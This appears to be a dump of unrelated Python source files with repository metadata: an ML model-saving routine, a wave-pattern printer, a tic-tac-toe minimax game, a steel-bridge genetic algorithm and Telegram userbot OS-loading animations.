assert isinstance(tmp, dict)
inputs = []
outputs = []
for inp in tmp["inputs"]:
inputs.append(TensorSpec(name=inp["name"], shape=inp["shape"], dtype=inp["dtype"]))
for out in tmp["outputs"]:
outputs.append(TensorSpec(name=out["name"], shape=out["shape"], dtype=out["dtype"]))
return ModelSpec(inputs=inputs, outputs=outputs)
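# Hedged sketch of the YAML layout load_model_spec expects (field names are taken from
# the code above; the concrete values and the helper function are illustrative only).
def _example_load_model_spec(spec_path="spec.yaml"):
    example = (
        "inputs:\n"
        "  - {name: input_1, shape: [1, 224, 224, 3], dtype: float32}\n"
        "outputs:\n"
        "  - {name: output_1, shape: [1, 1000], dtype: float32}\n"
    )
    with open(spec_path, "w") as f:
        f.write(example)
    spec = load_model_spec(spec_path)
    return spec.inputs[0].shape  # [1, 224, 224, 3]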
def save_model(model: Model, output_path: str, tvm_cfg: Optional[DictConfig] = None):
"""The function to save the model that is a tool output as a TAR file
Args:
model (Model): a tool output model
output_path (str): an output path
tvm_cfg (:obj:`DictConfig`, optional): pass to the TVM config if the model depends on the TVM
"""
if dataclasses.is_dataclass(model.spec):
spec = asdict(model.spec)
else:
assert False, f"model.spec should be arachne.data.ModelSpec: {model.spec}"
env = {"model_spec": spec, "dependencies": []}
pip_deps = []
if model.path.endswith(".tar"):
pip_deps.append({"tvm": tvm.__version__})
        assert tvm_cfg is not None, "when saving a tvm_package.tar, tvm_cfg must be available"
env["tvm_device"] = "cpu"
targets = list(tvm_cfg.composite_target)
if "tensorrt" in targets:
env["dependencies"].append({"tensorrt": get_tensorrt_version()})
if "cuda" in targets:
env["dependencies"].append({"cuda": get_cuda_version()})
env["dependencies"].append({"cudnn": get_cudnn_version()})
env["tvm_device"] = "cuda"
if model.path.endswith(".tflite"):
pip_deps.append({"tensorflow": tf.__version__})
if model.path.endswith("saved_model"):
pip_deps.append({"tensorflow": tf.__version__})
if model.path.endswith(".onnx"):
pip_deps.append({"onnx": onnx.__version__})
pip_deps.append({"onnxruntime": onnxruntime.__version__})
if model.path.endswith(".pth"):
pip_deps.append({"torch": torch.__version__}) # type: ignore
if model.path.endswith("_trt.pth"):
pip_deps.append({"torch2trt": get_torch2trt_version()})
env["dependencies"].append({"pip": pip_deps})
with tarfile.open(output_path, "w:gz") as tar:
tar.add(model.path, arcname=model.path.split("/")[-1])
with tempfile.TemporaryDirectory() as tmp_dir:
with open(tmp_dir + "/env.yaml", "w") as file:
yaml.dump(env, file)
tar.add(tmp_dir + "/env.yaml", arcname="env.yaml")
| 32.319797
| 101
| 0.658395
|
d51f72dc15fd932780a0e0f8d65cab5ccbe23cca
| 437
|
py
|
Python
|
Wave Patterns/wavepattern25.py
|
Daksh777/Python-PatternHouse
|
ab801631c2e1f5ed3cc12a26c959d41a5e51273d
|
[
"MIT"
] | 61
|
2021-01-07T03:56:25.000Z
|
2022-02-26T14:39:52.000Z
|
PythonPatternPrograms/WavePatterns/Pattern 25.py
|
Ankur-586/Printing-Pattern-Programs
|
33e534ed66a02705e6cd6bc1992d4818a44d1b6b
|
[
"MIT"
] | 851
|
2021-04-02T09:08:15.000Z
|
2022-01-12T11:26:57.000Z
|
PythonPatternPrograms/WavePatterns/Pattern 25.py
|
Ankur-586/Printing-Pattern-Programs
|
33e534ed66a02705e6cd6bc1992d4818a44d1b6b
|
[
"MIT"
] | 15
|
2021-04-13T06:10:17.000Z
|
2022-01-08T05:07:21.000Z
|
wH = 5 # 1
wL = 4 # 2
for x in range(1, wH + 1):
for y in range(1, wL + 1):
for z in range(1, wH + 1):
if (x == z or x + z == wH + 1):
print("*", end=" ")
else:
print(" ", end=" ") # 3
print()
"""
1) wH - change value to increase/decrease the height of the wave
2) wL - change value to increase/decrease the length of the wave
3) a single whitespace is printed for positions that are not part of the wave
"""
| 25.705882
| 64
| 0.475973
|
ebc15451fe0ebff5240009cca23e7a2897268689
| 150
|
py
|
Python
|
main.py
|
tahv0/etherneumpaymentbot
|
1485f6b069f698f5d29045414a4ebd4b2a924935
|
[
"BSD-2-Clause"
] | 2
|
2018-01-17T06:35:52.000Z
|
2019-12-16T16:02:08.000Z
|
main.py
|
tahv0/etherneumpaymentbot
|
1485f6b069f698f5d29045414a4ebd4b2a924935
|
[
"BSD-2-Clause"
] | null | null | null |
main.py
|
tahv0/etherneumpaymentbot
|
1485f6b069f698f5d29045414a4ebd4b2a924935
|
[
"BSD-2-Clause"
] | 3
|
2019-01-04T17:55:17.000Z
|
2021-07-16T22:58:42.000Z
|
#!/usr/bin/env python
from paymentpoller.blockchainpoller import start_polling
def run():
start_polling()
if __name__ == "__main__":
run()
| 15
| 56
| 0.713333
|
1074ddde0d610d4bc20845eaf5372f7802217d67
| 9,565
|
py
|
Python
|
chapter6_tictactoe.py
|
liangxuCHEN/Algorithms_python
|
c76e2396bd60f477b69ed55a9a7e7c86eff46ed4
|
[
"AFL-3.0"
] | 5
|
2020-12-11T08:14:08.000Z
|
2021-09-07T13:40:20.000Z
|
chapter6_tictactoe.py
|
liangxuCHEN/Algorithms_python
|
c76e2396bd60f477b69ed55a9a7e7c86eff46ed4
|
[
"AFL-3.0"
] | null | null | null |
chapter6_tictactoe.py
|
liangxuCHEN/Algorithms_python
|
c76e2396bd60f477b69ed55a9a7e7c86eff46ed4
|
[
"AFL-3.0"
] | 4
|
2021-07-13T02:14:57.000Z
|
2022-02-23T09:21:25.000Z
|
import time
class Game(object):
"""井字游戏"""
def __init__(self):
# 实例化类便开始初始化游戏
self.initialize_game()
# 初始化棋盘
def initialize_game(self):
self.current_state = [['.','.','.'],
['.','.','.'],
['.','.','.']]
# 玩家X用X作为标记,作为先手
self.player_turn = 'X'
# 打印棋盘在屏幕上
def draw_board(self):
for i in range(0, 3):
for j in range(0, 3):
# 如果棋盘没有放置,显示位置坐标
if self.current_state[i][j] == ".":
val = "({},{})".format(i, j)
else:
val = self.current_state[i][j]
if j != 2:
print('%-5s|' % val, end=" ") # -5s是指定占位空间
else: # 最后一个元素输出就换行
print('{}'.format(val))
print()
# 判断棋子位置是否合理
def is_valid(self, px, py):
if px < 0 or px > 2 or py < 0 or py > 2:
return False # 坐标不在棋盘上,不通过
elif self.current_state[px][py] != '.':
return False # 坐标已经有标记了,不通过
else: # 其他情况是合理的
return True
    # After every move, check whether the game has ended and return the winner
    def is_end(self):
        for i in range(0, 3):
            # Horizontal line of three?
            if (self.current_state[i] == ['X', 'X', 'X']):
                return 'X'
            elif (self.current_state[i] == ['O', 'O', 'O']):
                return 'O'
            # Vertical line of three?
            if self.current_state[0][i] != '.':
                if self.current_state[0][i] == self.current_state[1][i] == self.current_state[2][i]:
                    return self.current_state[0][i] # return the winner (the symbol at that position)
        # Main diagonal line of three?
        if self.current_state[0][0] != '.':
            if self.current_state[0][0] == self.current_state[1][1] == self.current_state[2][2]:
                return self.current_state[0][0]
        # Anti-diagonal line of three?
        if self.current_state[0][2] != '.':
            if self.current_state[0][2] == self.current_state[1][1] == self.current_state[2][0]:
                return self.current_state[0][2]
        # Is the board full?
        for i in range(0, 3):
            if self.current_state[i].count(".") > 0: # if "." remains, there are still empty squares
                return None # empty squares remain: return None, the game continues
        return '.' # a draw returns "."
    # The 'O' player is the computer, which maximizes
    def max(self):
        # Possible values are -1 (loss), 0 (draw), 1 (win)
        max_val = -2 # max_val is the initial alpha value; -2 is lower than any possible value
        px = None # initialize move coordinates
        py = None
        result = self.is_end() # current game result
        # If the game has already ended, this is the recursion's base case.
        # The full game tree is built here, so no recursion depth limit is set:
        # recurse until the game ends and return the evaluation for that outcome.
if result == 'X':
return (-1, 0, 0)
elif result == 'O':
return (1, 0, 0)
elif result == '.':
return (0, 0, 0)
for i in range(0, 3):
for j in range(0, 3):
if self.current_state[i][j] == '.':
                    # Try every square: if it is empty, tentatively place a piece there
                    self.current_state[i][j] = 'O'
                    # Then, as a branch, take the maximum over the next level's minimizing results
                    (m, min_i, min_j) = self.min()
                    if m > max_val: # a new maximum: update the move coordinates
                        max_val = m
                        px = i
                        py = j
                    self.current_state[i][j] = '.' # clear the square after the trial
        return (max_val, px, py)
    # The 'X' player is the human, the computer's opponent, so it minimizes
    def min(self):
        # Possible values are -1 (win), 0 (draw), 1 (loss), the opposite of the computer
        min_val = 2 # initialize min_val; 2 is higher than any possible value
        qx = None # initialize move coordinates
        qy = None
        result = self.is_end() # current game result
if result == 'X':
return (-1, 0, 0)
elif result == 'O':
return (1, 0, 0)
elif result == '.':
return (0, 0, 0)
for i in range(0, 3):
for j in range(0, 3):
if self.current_state[i][j] == '.':
                    # Try every square: if it is empty, tentatively place a piece there
                    self.current_state[i][j] = 'X'
                    # Then, as a branch, take the minimum over the next level's maximizing results
                    (m, max_i, max_j) = self.max()
                    if m < min_val: # a new minimum: update the move coordinates
                        min_val = m
                        qx = i
                        qy = j
                    self.current_state[i][j] = '.'
        return (min_val, qx, qy)
    # Start the game (program entry point)
    def play(self):
        # Plain minimax algorithm
        while True: # take turns until the game ends
            self.draw_board() # print the current board first
            self.result = self.is_end() # check whether the game is over
            if self.result != None: # game over
                if self.result == 'X': # X is the winner
                    print('X wins!')
                elif self.result == 'O': # and likewise for O
                    print('O wins!')
                elif self.result == '.': # draw
                    print("Draw")
                self.initialize_game() # reset the board and end the game
                return
            # If the game is not over, see whose turn it is
            if self.player_turn == 'X': # X's turn
                while True:
                    start = time.time() # time X's "thinking"
                    # This hint for the human player is optional and can be skipped
                    (m, qx, qy) = self.min() # X is the human, the program's opponent, so search for the minimum
                    end = time.time() # done thinking; qx, qy are the suggested coordinates
                    print('Time taken: {}s'.format(round(end - start, 7)))
                    print('Suggested move: X = {}, Y = {}'.format(qx, qy))
                    try:
                        px = int(input('Enter coordinate x: '))
                        py = int(input('Enter coordinate y: '))
                    except:
                        # If the input cannot be converted to an integer, ask again
                        print('Invalid input, please try again.')
                        break
                    if self.is_valid(px, py):
                        self.current_state[px][py] = 'X'
                        self.player_turn = 'O'
                        break
                    else:
                        print('Invalid input, please try again.')
            else:
                (m, px, py) = self.max() # computer's turn, so search for the maximum
                self.current_state[px][py] = 'O'
                self.player_turn = 'X'
def max_alpha_beta(self, alpha, beta):
max_val = -2
px = None
py = None
result = self.is_end()
if result == 'X':
return (-1, 0, 0)
elif result == 'O':
return (1, 0, 0)
elif result == '.':
return (0, 0, 0)
for i in range(0, 3):
for j in range(0, 3):
if self.current_state[i][j] == '.':
self.current_state[i][j] = 'O'
(m, min_i, in_j) = self.min_alpha_beta(alpha, beta)
if m > max_val:
max_val = m
px = i
py = j
self.current_state[i][j] = '.'
                    # Same idea as before; the main addition is the pruning check below
alpha = max(max_val, alpha)
if beta <= alpha:
return (max_val, px, py)
return (max_val, px, py)
def min_alpha_beta(self, alpha, beta):
min_val = 2
qx = None
qy = None
result = self.is_end()
if result == 'X':
return (-1, 0, 0)
elif result == 'O':
return (1, 0, 0)
elif result == '.':
return (0, 0, 0)
for i in range(0, 3):
for j in range(0, 3):
if self.current_state[i][j] == '.':
self.current_state[i][j] = 'X'
(m, max_i, max_j) = self.max_alpha_beta(alpha, beta)
if m < min_val:
min_val = m
qx = i
qy = j
self.current_state[i][j] = '.'
                    # Same idea as before; the main addition is the pruning check below
beta = min(min_val, beta)
if beta <= alpha:
return (min_val, qx, qy)
return (min_val, qx, qy)
def play_alpha_beta(self):
        # Minimax algorithm with alpha-beta pruning
        while True:
            self.draw_board() # print the current board first
            self.result = self.is_end() # check whether the game is over
            if self.result != None: # game over
                if self.result == 'X': # X is the winner
                    print('X wins!')
                elif self.result == 'O': # and likewise for O
                    print('O wins!')
                elif self.result == '.': # draw
                    print("Draw")
                self.initialize_game() # reset the board and end the game
                return
            if self.player_turn == 'X':
                while True:
                    start = time.time()
                    # X is the human, the program's opponent, so search for the minimum; alpha and beta start at -2 and 2
                    (m, qx, qy) = self.min_alpha_beta(-2, 2)
                    end = time.time()
                    print('Time taken: {}s'.format(round(end - start, 7)))
                    print('Suggested move: X = {}, Y = {}'.format(qx, qy))
                    try:
                        px = int(input('Enter coordinate x: '))
                        py = int(input('Enter coordinate y: '))
                    except:
                        # If the input cannot be converted to an integer, ask again
                        print('Invalid input, please try again.')
                        break
                    if self.is_valid(px, py):
                        self.current_state[px][py] = 'X'
                        self.player_turn = 'O'
                        break
                    else:
                        print('Invalid input, please try again.')
            else:
                # Computer's turn, so search for the maximum; alpha and beta start at -2 and 2
                (m, px, py) = self.max_alpha_beta(-2, 2)
self.current_state[px][py] = 'O'
self.player_turn = 'X'
if __name__ == "__main__":
g = Game()
g.play_alpha_beta()
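# Hedged usage sketch (not part of the original script): query the engine
# programmatically instead of through the interactive loop above.
def best_move_for_o(game):
    """Return (value, row, col) of the computer's best move in the given position."""
    # 'O' is the maximizing player; alpha/beta start outside the [-1, 1] value range.
    return game.max_alpha_beta(-2, 2)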
| 36.09434
| 101
| 0.404391
|
a9bb5d28443e1d82c0b3ff6a7ae144e87db5b58e
| 8,302
|
py
|
Python
|
GA.py
|
danielo620/Steel
|
049719988c1d69df25aaf2c7201421d9f556dafe
|
[
"Apache-2.0"
] | null | null | null |
GA.py
|
danielo620/Steel
|
049719988c1d69df25aaf2c7201421d9f556dafe
|
[
"Apache-2.0"
] | null | null | null |
GA.py
|
danielo620/Steel
|
049719988c1d69df25aaf2c7201421d9f556dafe
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import Section
from joblib import Parallel, delayed
import SolutionStiffnessSpeed
import CostCalculator
import Mutation3
import UniformCrossover
import Roullette
import os
from timeit import default_timer as timer
import xlsxwriter
import pandas as pd
path = 'C:/Users/rocky/Desktop/Code/NPZ' # path of location of data.npz folder
pathOPT = 'C:/Users/rocky/Desktop/Code/OPT' # path to where to place information for further analyses
pathOP = 'C:/Users/rocky/Desktop/Code/Op/' # path to where to place the Excel file with the optimized cross-section for VA
# Load Case
LC = 3
# Genetic Algorithm parameter
NP = 50 # number of particles
Itt = 100 # number of Iterations
PC = 1 # Ratio of children made per generation
mu = 0.035 # probability of mutating
cr = .6 # probability of crossing
# Cost function Slop
SlopD = 1.9
SlopW = 13
'''
'''
# start Parallel Pool
with Parallel(n_jobs=12, prefer="threads") as Parallel:
with os.scandir(path=path) as entries:
for entry in entries:
# Extract Data from file
File = entry.name
npzfile = np.load((os.path.join(path, File)))
Shape_Dimension = npzfile['Shape_Dimension']
AgrJN = npzfile['AgrJN']
Transmatrix = npzfile['Transmatrix']
TransT = npzfile['TransT']
Section_Prop = npzfile['Section_Prop']
P = npzfile['P']
L = npzfile['L']
MemberCOORDNum = npzfile['MemberCOORDNum']
G = np.min(MemberCOORDNum)
Shape_Set = npzfile['Shape_Set']
Group = npzfile['Group']
NM = npzfile['NM']
NR = npzfile['NR']
NDOF = npzfile['NDOF']
COORDNum = npzfile['COORDNum']
Modules = npzfile['Modules']
Wt = npzfile['Wt']
# Choose from desire Load Case
if LC == 1:
Pf = P[:, 0]
DNumber = AgrJN[:, 0]
elif LC == 2:
Pf = P[:, 1]
DNumber = AgrJN[:, 1]
elif LC == 3:
Pf = P[:, 2]
DNumber = AgrJN[:, 2]
elif LC == 4:
Pf = P[:, 3]
DNumber = AgrJN[:, 3]
elif LC == 5:
Pf = P[:, 4]
DNumber = AgrJN[:, 4]
else:
Pf = P[:, 5]
DNumber = AgrJN[:, 5]
# Dynamic Exploration Parameters
nvarmin = Shape_Set[:, 0]
nvarmax = Shape_Set[:, 1]
sigma = (Shape_Set[:, 1] - Shape_Set[:, 0] + 1) / 2
dynamicSig = (sigma - 1) / 100
# Blanks for Optimization
size = np.shape(Shape_Set[:, 0])[0]
MemberProp = np.zeros((NP, NM, 4))
GroupShape = np.zeros((NP, size), dtype=np.intc)
Local_Matrix = np.zeros((NP, NM, 12, 12))
AgrD = np.zeros(NP)
AgrDC = np.zeros(NP)
weight = np.zeros(NP)
Cost = np.zeros(NP)
CostC = np.zeros(NP)
Agr1 = np.zeros(1)
Agr2 = np.zeros(1)
# Create Random finesses population
Section.memgroupsec(NP, GroupShape, Shape_Set)
MemberProp[:, :] = Section_Prop[GroupShape[:, Group], :]
# start timer
start = timer()
# Run fitness function for starting population
Parallel(
delayed(SolutionStiffnessSpeed.DisplacementCy2)(NM, Modules, TransT, Transmatrix, NDOF, MemberCOORDNum,
L, Pf, MemberProp[x], Local_Matrix[x], COORDNum,
x, AgrD, DNumber, Agr1, Agr2)
for x in range(NP))
# evaluate starting population
weight[:] = np.sum(Wt[GroupShape[:, Group[:]]] * L, axis=1) / 12 + SlopW # weight function
CostCalculator.BridgeCost(SlopD, weight, AgrD, NP, Cost) # Cost Function
A = np.argmin(Cost)
BestP = Cost[A]
W = weight[A]
Deflection = AgrD[A]
setT = GroupShape[A]
for y in range(Itt):
J = np.arange(1, NP + 1)
J = np.flip(J)
J = J ** 5
Jsum = np.abs(np.sum(J))
PP = J / Jsum
NP = (np.round(PC * NP / 2) * 2).astype(np.intc)
CGroup = np.zeros(GroupShape.shape, dtype=np.intc)
chance = np.random.random(NP)
# Elitism (Keep the best individual of the population for the next generation)
Elite = GroupShape[0, :]
EliteCost = Cost[0]
# Parent Choosing and Mutation
for z in range((NP / 2).astype(np.intc)):
# select parents
P1 = Roullette.Wheel(PP)
P2 = Roullette.Wheel(PP)
# Crossover (Create children)
UniformCrossover.Uniform(GroupShape[P1], GroupShape[P2], CGroup, z, chance, cr, GroupShape[0])
# Mutation
Mutation3.mutant(CGroup[2 * z], CGroup[2 * z + 1], CGroup, mu, z, sigma)
            # constrain offspring to the allowed shape set
CGroup[:] = np.where(CGroup > Shape_Set[:, 0], CGroup, Shape_Set[:, 0])
CGroup[:] = np.where(CGroup < Shape_Set[:, 1], CGroup, Shape_Set[:, 1])
# evaluate children fitness
MemberProp[:, :] = Section_Prop[CGroup[:, Group], :]
Parallel(
delayed(SolutionStiffnessSpeed.DisplacementCy2)(NM, Modules, TransT, Transmatrix, NDOF,
MemberCOORDNum, L, Pf, MemberProp[x],
Local_Matrix[x], COORDNum, x, AgrDC, DNumber, Agr1, Agr2)
for x in range(NP))
# evaluate cost of each children
weightC = np.zeros(NP)
weightC[:] = np.sum(Wt[CGroup[:, Group[:]]] * (L / 12), axis=1) + SlopW
# cost function
CostCalculator.BridgeCost(SlopD, weightC, AgrDC, NP, CostC)
A = np.argmin(CostC)
BestC = CostC[A]
# Update Population Best
if BestC < BestP:
setT = CGroup[A]
BestP = BestC
W = weightC[A]
Deflection = AgrDC[A]
print("Cost = ", BestP, " AgrD = ", Deflection, " Weight = ", W)
# merge population
Cost = np.hstack([Cost, CostC, EliteCost])
X = np.argsort(Cost)
GroupShape = np.vstack([GroupShape, CGroup, Elite])
GroupShape = GroupShape[X, :]
GroupShape = GroupShape[:NP, :]
Cost = Cost[X]
Cost = Cost[:NP]
# dynamic mutation parameters
mu = mu - .000005
sigma -= dynamicSig
# time taken to run each file
end = timer()
print(end - start)
# parameters of the most fit child
Result = Shape_Dimension[setT]
Q = np.where(Result[:, 2] == 0)
Result = Result.astype(np.object_)
Result[Q, 2] = "NaN"
# save results for further analysis
np.savez((os.path.join(pathOPT, File[:-4] + 'OPT')), setT=setT, W=W, NDOF=NDOF, COORDNum=COORDNum, MemberCOORDNum=MemberCOORDNum, Section_Prop=Section_Prop, Group=Group, AgrJN=AgrJN, P=P, L=L, NM=NM, Modules=Modules, TransT=TransT, Transmatrix=Transmatrix)
workbook = xlsxwriter.Workbook(pathOP + File[:-4] + '.xlsx')
worksheet = workbook.add_worksheet()
workbook.close()
df = pd.DataFrame(Result)
df.to_excel(pathOP + File[:-4] + '.xlsx', index=False)
end = timer()
print(end - start)
| 38.613953
| 269
| 0.484462
|
79a8db3fec89730990fa9a30047a9003026f5314
| 8,019
|
py
|
Python
|
userbot/plugins/os.py
|
Fregiant16/fregiantuserbot
|
6cb23022a1dfa66551c5ded1928d9fded16e0684
|
[
"MIT"
] | 1
|
2020-04-14T15:19:47.000Z
|
2020-04-14T15:19:47.000Z
|
userbot/plugins/os.py
|
Fregiant16/fregiantuserbot
|
6cb23022a1dfa66551c5ded1928d9fded16e0684
|
[
"MIT"
] | null | null | null |
userbot/plugins/os.py
|
Fregiant16/fregiantuserbot
|
6cb23022a1dfa66551c5ded1928d9fded16e0684
|
[
"MIT"
] | 2
|
2020-12-01T02:27:27.000Z
|
2022-02-16T08:32:11.000Z
|
"""Emoji
Available Commands:
.emoji shrug
.emoji apple
.emoji :/
.emoji -_-"""
from telethon import events
import asyncio
from userbot import CMD_HELP
from userbot.utils import admin_cmd
@borg.on(admin_cmd(pattern=f"macos", allow_sudo=True))
@borg.on(events.NewMessage(pattern=r"\.(.*)", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.5
animation_ttl = range(0, 11)
input_str = event.pattern_match.group(1)
if input_str == "macos":
await event.edit(input_str)
animation_chars = [
"`Connessione a Hackintosh...`",
"`Inizializza Hackintosh Login.`",
"`Loading Hackintosh... 0%\n▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Hackintosh... 3%\n█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Hackintosh... 9%\n██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Hackintosh... 23%\n█████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Hackintosh... 39%\n█████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Hackintosh... 69%\n█████████████▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Hackintosh... 89%\n█████████████████████▒▒▒▒ `",
"`Loading Hackintosh... 100%\n█████████████████████████ `",
"`Welcome...\n\nStock OS: Symbian OS\nCurrent OS: Hackintosh`\n\n**My PC Specs:**\n\n **CPU:** __2.9GHz Intel Core i9-8950HK (hexa-core, 12MB cache, up to 4.8GHz)__\n\n**Graphics:** __Nvidia GeForce GTX 1080 OC (8GB GDDR5X)__\n\n**RAM:** __32GB DDR4 (2,666MHz)__\n\n**Screen:** __17.3-inch, QHD (2,560 x 1,440) 120Hz G-Sync__\n\n**Storage:** __512GB PCIe SSD, 1TB HDD (7,200 rpm)__\n\n**Ports:** __2 x USB 3.0, 1 x USB-C 3.0, 1 x USB-C (Thunderbolt 3), HDMI, mini DisplayPort, Ethernet, headphone jack, microphone jack__\n\n**Connectivity:** __Killer 1550 802.11ac Wi-Fi, Bluetooth 5.0__\n\n**Camera:** __Alienware FHD camera, Tobii IR Eye-tracking with Windows Hello__\n\n**Size:** __16.7 x 13.1 x 1.18 inches (42.4 x 33.2 x 2.99cm; W x D x H)__"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 11])
@borg.on(admin_cmd(pattern=f"windows", allow_sudo=True))
@borg.on(events.NewMessage(pattern=r"\.(.*)", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.5
animation_ttl = range(0, 11)
input_str = event.pattern_match.group(1)
if input_str == "windows":
await event.edit(input_str)
animation_chars = [
"`Connessione a Windows 10...`",
"`Inizializza Windows 10 Login.`",
"`Loading Windows 10... 0%\n▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Windows 10... 3%\n█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Windows 10... 9%\n██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Windows 10... 23%\n█████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Windows 10... 39%\n█████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Windows 10... 69%\n█████████████▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Windows 10... 89%\n█████████████████████▒▒▒▒ `",
"`Loading Windows 10... 100%\n█████████████████████████ `",
"`Welcome...\n\nStock OS: Symbian OS\nCurrent OS: Windows 10`\n\n**My PC Specs:**\n\n **CPU:** __2.9GHz Intel Core i9-8950HK (hexa-core, 12MB cache, up to 4.8GHz)__\n\n**Graphics:** __Nvidia GeForce GTX 1080 OC (8GB GDDR5X)__\n\n**RAM:** __32GB DDR4 (2,666MHz)__\n\n**Screen:** __17.3-inch, QHD (2,560 x 1,440) 120Hz G-Sync__\n\n**Storage:** __512GB PCIe SSD, 1TB HDD (7,200 rpm)__\n\n**Ports:** __2 x USB 3.0, 1 x USB-C 3.0, 1 x USB-C (Thunderbolt 3), HDMI, mini DisplayPort, Ethernet, headphone jack, microphone jack__\n\n**Connectivity:** __Killer 1550 802.11ac Wi-Fi, Bluetooth 5.0__\n\n**Camera:** __Alienware FHD camera, Tobii IR Eye-tracking with Windows Hello__\n\n**Size:** __16.7 x 13.1 x 1.18 inches (42.4 x 33.2 x 2.99cm; W x D x H)__"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 11])
@borg.on(admin_cmd(pattern=f"linux", allow_sudo=True))
@borg.on(events.NewMessage(pattern=r"\.(.*)", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.5
animation_ttl = range(0, 11)
input_str = event.pattern_match.group(1)
if input_str == "linux":
await event.edit(input_str)
animation_chars = [
"`Connessione a Linux...`",
"`Inizializza Linux Login.`",
"`Loading Linux... 0%\n▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Linux... 3%\n█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Linux... 9%\n██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Linux... 23%\n█████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Linux... 39%\n█████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Linux... 69%\n█████████████▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Linux... 89%\n█████████████████████▒▒▒▒ `",
"`Loading Linux... 100%\n█████████████████████████ `",
"`Welcome...\n\nStock OS: Symbian OS\nCurrent OS: Linux`\n\n**My PC Specs:**\n\n **CPU:** __2.9GHz Intel Core i9-8950HK (hexa-core, 12MB cache, up to 4.8GHz)__\n\n**Graphics:** __Nvidia GeForce GTX 1080 OC (8GB GDDR5X)__\n\n**RAM:** __32GB DDR4 (2,666MHz)__\n\n**Screen:** __17.3-inch, QHD (2,560 x 1,440) 120Hz G-Sync__\n\n**Storage:** __512GB PCIe SSD, 1TB HDD (7,200 rpm)__\n\n**Ports:** __2 x USB 3.0, 1 x USB-C 3.0, 1 x USB-C (Thunderbolt 3), HDMI, mini DisplayPort, Ethernet, headphone jack, microphone jack__\n\n**Connectivity:** __Killer 1550 802.11ac Wi-Fi, Bluetooth 5.0__\n\n**Camera:** __Alienware FHD camera, Tobii IR Eye-tracking with Windows Hello__\n\n**Size:** __16.7 x 13.1 x 1.18 inches (42.4 x 33.2 x 2.99cm; W x D x H)__"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 11])
@borg.on(admin_cmd(pattern=f"stock", allow_sudo=True))
@borg.on(events.NewMessage(pattern=r"\.(.*)", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.5
animation_ttl = range(0, 11)
input_str = event.pattern_match.group(1)
if input_str == "stock":
await event.edit(input_str)
animation_chars = [
"`Connessione a Symbian OS...`",
"`Inizializza Symbian OS Login.`",
"`Loading Symbian OS... 0%\n█████████████████████████ `",
"`Loading Symbian OS... 3%\n█████████████████████▒▒▒▒ `",
"`Loading Symbian OS... 9%\n█████████████▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Symbian OS... 23%\n█████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Symbian OS... 39%\n█████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Symbian OS... 69%\n██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Symbian OS... 89%\n█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Symbian OS... 100%\n▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Welcome...\n\nStock OS: Symbian OS\nCurrent OS: Symbian OS`\n\n**My PC Specs:**\n\n **CPU:** __2.9GHz Intel Core i9-8950HK (hexa-core, 12MB cache, up to 4.8GHz)__\n\n**Graphics:** __Nvidia GeForce GTX 1080 OC (8GB GDDR5X)__\n\n**RAM:** __32GB DDR4 (2,666MHz)__\n\n**Screen:** __17.3-inch, QHD (2,560 x 1,440) 120Hz G-Sync__\n\n**Storage:** __512GB PCIe SSD, 1TB HDD (7,200 rpm)__\n\n**Ports:** __2 x USB 3.0, 1 x USB-C 3.0, 1 x USB-C (Thunderbolt 3), HDMI, mini DisplayPort, Ethernet, headphone jack, microphone jack__\n\n**Connectivity:** __Killer 1550 802.11ac Wi-Fi, Bluetooth 5.0__\n\n**Camera:** __Alienware FHD camera, Tobii IR Eye-tracking with Windows Hello__\n\n**Size:** __16.7 x 13.1 x 1.18 inches (42.4 x 33.2 x 2.99cm; W x D x H)__"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 11])
| 43.345946
| 759
| 0.536351
|
078ba44bc1dc4e8511b0c4cfa1d00b1f3584dbbb
| 6,060
|
py
|
